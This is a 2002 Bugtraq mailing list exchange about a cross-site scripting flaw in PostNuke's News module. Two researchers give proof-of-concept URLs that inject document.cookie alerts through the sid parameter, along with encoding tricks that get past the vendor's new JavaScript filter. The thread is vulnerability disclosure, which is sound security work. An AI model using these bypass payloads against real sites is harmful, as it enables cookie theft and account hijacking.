Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Postnuke XSS fixed
From: Muhammad Faisal Rauf Danka <mfrd () attitudex com>
Date: Wed, 2 Oct 2002 16:24:15 -0700 (PDT)

I just checked it again :

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>

where + denotes a blank space or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script>

resulting in Sorry - $HTTP_GET_VARS contains javascript... Msg.

However the request:
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>

or any character inserted before first "script" and after first less than "<" resulting in DB Error, revealing nothing 
(user/pass/path etc).

But I used I.E and Netscape, maybe it's different with other browsers. :)

Regards
--------
Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202


--- Daniel Woods <dwoods () ucalgary ca> wrote:

Humm!

on 26th Sep the following url:
http://news.postnuke.com/modules.php
             ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

used to give Alert PopUp and
Error:
DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
at line 23

now it gives:
Sorry - $HTTP_GET_VARS contains javascript...

Prompt fix by PostNuke team, great work Keep it up! :)

Not so fast on the praise :(

It only took me a couple of workarounds to find ways to bypass the check.

 http://news.postnuke.com/modules.php
        ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

Using the request...
        ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
gives me the DB Error: message

And using the request...
        ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.

Thanks... Dan.

_____________________________________________________________
---------------------------
[ATTITUDEX.COM]
http://www.attitudex.com/
---------------------------

_____________________________________________________________
Select your own custom email address for FREE! Get you () yourchoice com w/No Ads, 6MB, POP & more! 
http://www.everyone.net/selectmail?campaign=tag


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]